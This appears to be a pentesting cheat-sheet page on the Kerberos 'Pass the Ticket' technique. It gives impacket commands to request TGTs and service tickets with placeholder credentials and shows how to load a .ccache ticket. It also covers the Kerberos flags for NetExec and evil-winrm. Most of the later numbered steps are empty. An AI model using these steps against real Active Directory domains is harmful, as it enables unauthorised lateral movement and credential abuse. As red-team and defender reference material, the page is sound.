search
githubEdit

Pass the Ticket

hashtag
Pass the Ticket (ccache / kirbi)

hashtag
Tools: mimikatz , rubeus , impacket , ticketConverter.py , secretsdump , tgssub.py

hashtag
Steps:

hashtag
1) Request a TGT or a ST

getTGT.py -dc-ip <DC_IP> domain.local/user1:password

getST.py -spn "cifs/target.domain.local" -dc-ip <DC_IP> domain.local/user1:password

hashtag
2) Use the tickets

Load a kerberos ticket in .ccache format : export KRB5CCNAME=./ticket.ccache

hashtag
Globally, all the Impacket tools and the ones that use the library can authenticate via Kerberos with the -k -no-pass command line parameter instead of specifying the password. For ldeep it's -k.

For NetExec it is -k with credentials to perform the whole Kerberos process and authenticate with the ticket. If a .ccache ticket is already in memory, it is -k --use-kcache.

https://hideandsec.sh/link/71#bkmrk-for-evil-winrm-it%27s-

For evil-winrm it's -r --spn <SPN_prefix> (default 'HTTP'). The realm must be specified in the file /etc/krb5.conf using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }

If the Kerberos ticket is in .kirbi format it can be converted like this in the below command:

hashtag
Convert format (Use this depending on use case)

hashtag
Convert Base64 ticket to both .ccache and .kirbi https://github.com/SolomonSklash/RubeusToCcache

1) Rubeus

2) Mimikatz

3) secretsdump

4) impacket tools (Grant System/Admin access)

5) tgssub.py

hashtag
Modify SPN

hashtag
Tool: Mimikatz

OR

1)

2)

3)

hashtag
TIP: TGTs = Admin Credentials.

Access to any service the user is allowed to access.

hashtag
TGSs=Low-privileged account

hashtag
Alternate Method: Rubeus

PreviousKerberosNextaesKey

Last updated